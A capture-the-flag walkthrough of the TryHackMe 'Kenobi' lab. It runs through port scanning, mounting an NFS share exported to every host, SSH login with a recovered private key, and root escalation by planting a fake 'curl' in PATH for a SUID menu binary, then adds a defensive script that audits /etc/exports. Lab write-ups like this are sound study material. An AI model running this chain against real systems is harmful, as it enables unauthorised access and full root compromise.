nmap -p- --min-rate 100 --max-retries 2 -Pn 10.10.10.10 -v
Discovered open port 80/tcp on 10.10.10.10
Discovered open port 111/tcp on 10.10.10.10
Discovered open port 445/tcp on 10.10.10.10
Discovered open port 139/tcp on 10.10.10.10
Discovered open port 22/tcp on 10.10.10.10
Discovered open port 36263/tcp on 10.10.10.10
Discovered open port 58087/tcp on 10.10.10.10
nmap -A -p22,80,111,139,445,36263,58087 10.10.10.10
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 5b:68:55:83:8d:12:74:5b:55:12:ac:cb:76:1c:04:c2 (RSA)
| 256 c5:26:6a:94:4f:74:3a:55:00:b1:9f:d1:bc:77:de:42 (ECDSA)
|_ 256 e7:60:61:ca:d0:30:26:2e:cb:ea:61:04:5d:49:f0:d4 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/admin.html
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100003 3,4 2049/tcp nfs
| 100005 1,2,3 58087/tcp mountd
| 100021 1,3,4 37297/tcp nlockmgr
| 100227 3 2049/tcp nfs_acl
139/tcp open netbios-ssn Samba smbd 4
445/tcp open netbios-ssn Samba smbd 4
36263/tcp open mountd 1-3 (RPC #100005)
58087/tcp open mountd 1-3 (RPC #100005)
showmount -e 10.10.10.10
Export list for 10.10.10.10:
/var *
┌──(root㉿root)-[~/Desktop/THM/Kenobi]
└─$ mkdir /tmp/nfs
┌──(root㉿root)-[~/Desktop/THM/Kenobi]
└─$ sudo mount -t nfs 10.10.10.10:/var /tmp/nfs
┌──(root㉿root)-[~/Desktop/THM/Kenobi]
└─$ ls -la /tmp/nfs
total 52
drwxr-xr-x 14 root root 4096 Sep 4 2019 .
drwxrwxrwt 20 root root 480 Jan 4 15:02 ..
drwxr-xr-x 2 root root 4096 Sep 4 2019 backups
drwxr-xr-x 15 root root 4096 Aug 10 12:18 cache
drwxrwxrwt 2 root root 4096 Sep 4 2019 crash
drwxr-xr-x 51 root root 4096 Aug 10 12:18 lib
drwxrwsr-x 2 root staff 4096 Apr 13 2016 local
lrwxrwxrwx 1 root root 9 Sep 4 2019 lock -> /run/lock
drwxrwxr-x 13 root lpadmin 4096 Jan 4 14:57 log
drwxrwsr-x 2 root mail 4096 Feb 27 2019 mail
drwxr-xr-x 2 root root 4096 Feb 27 2019 opt
lrwxrwxrwx 1 root root 4 Sep 4 2019 run -> /run
drwxr-xr-x 5 root root 4096 Aug 9 19:08 snap
drwxr-xr-x 5 root root 4096 Sep 4 2019 spool
drwxrwxrwt 8 root root 4096 Jan 4 15:03 tmp
drwxr-xr-x 3 root root 4096 Sep 4 2019 www
┌──(root㉿root)-[/tmp/nfs/tmp]
└─$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA4PeD0e0522UEj7xlrLmN68R6iSG3HMK/aTI812CTtzM9gnXs
... [REDACTED FOR SECURITY] ...
-----END RSA PRIVATE KEY-----
┌──(root㉿root)-[/tmp/nfs/tmp]
└─$ cp id_rsa ~/Desktop/THM/Kenobi
smbclient -L //10.10.10.10/
Password for [WORKGROUP\root]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk
IPC$ IPC IPC Service (kenobi server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 10.10.10.10 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
smbclient //10.10.10.10/anonymous
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Sep 4 16:19:09 2019
.. D 0 Sat Aug 9 18:33:22 2025
log.txt N 12237 Wed Sep 4 16:19:09 2019
9183416 blocks of size 1024. 2918336 blocks available
smb: \> get log.txt
getting file \log.txt of size 12237 as log.txt (37.5 KiloBytes/sec) (average 37.5 KiloBytes/sec)
smb: \>
I got the username kenobi, logged in over SSH using id_rsa, and got the user flag.
ssh kenobi@10.10.10.10 -i id_rsa
kenobi@kenobi:~$ ls
share user.txt
kenobi@kenobi:~$ cat user.txt
THM{REDACTED}
find / -perm -u=s -type f 2>/dev/null
/usr/bin/menu # GOT THIS BINARY WHICH IS RUN BY ROOT
ls -la /usr/bin/menu
-rwsr-xr-x 1 root root 8880 Sep 4 2019 /usr/bin/menu
strings /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
curl -I localhost
uname -r
ifconfig
Invalid choice
echo "/bin/sh">/tmp/curl
chmod 777 /tmp/curl
export PATH=/tmp:$PATH
echo $PATH
/tmp:/home/kenobi/bin:/home/kenobi/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
kenobi@kenobi:~$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
# whoami
root
# cat /root/root.txt
THM{REDACTED}
#
The /var NFS share was exported to everyone (*).
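
Added example (not part of the original write-up): a server-side check for the finding above, flagging /etc/exports entries that are open to every host, as /var was here. The function name audit_exports and the sample lines are constructed for illustration; it assumes no quoted paths or backslash line continuations.

```shell
#!/bin/sh
# audit_exports [FILE]: read exports(5)-style text from FILE (or stdin) and
# print "PATH CLIENT REASON" for every entry that any host can mount.
# Flagged: a bare "*" client, "*(opts)", and "(opts)" with no host in front,
# which happens when a space slips in between the host and its options.
audit_exports() {
    awk '
    { sub(/#.*/, "") }          # drop comments; awk re-splits the fields
    NF < 2 { next }             # blank line, or a path with no client list
    {
        for (i = 2; i <= NF; i++) {
            host = $i; opts = ""
            p = index($i, "(")
            if (p > 0) {
                host = substr($i, 1, p - 1)
                opts = substr($i, p + 1)
                sub(/\)$/, "", opts)
            }
            if (host != "" && host != "*") continue
            reason = "world"
            if (("," opts ",") ~ /,no_root_squash,/) reason = reason "+no_root_squash"
            if (("," opts ",") ~ /,rw,/) reason = reason "+rw"
            print $1, (host == "" ? "(anon)" : host), reason
        }
    }' "${1:--}"
}

# Constructed sample input, not taken from the target machine.
audit_exports <<'EOF'
# /etc/exports (sample)
/var        *
/srv/data   192.168.1.0/24(rw,sync)
/home       trusted.example(rw) (ro)
/opt/build  *(rw,no_root_squash)
EOF
```

On a real server, run it as audit_exports /etc/exports and replace each flagged client with the specific hosts or subnets that need the share.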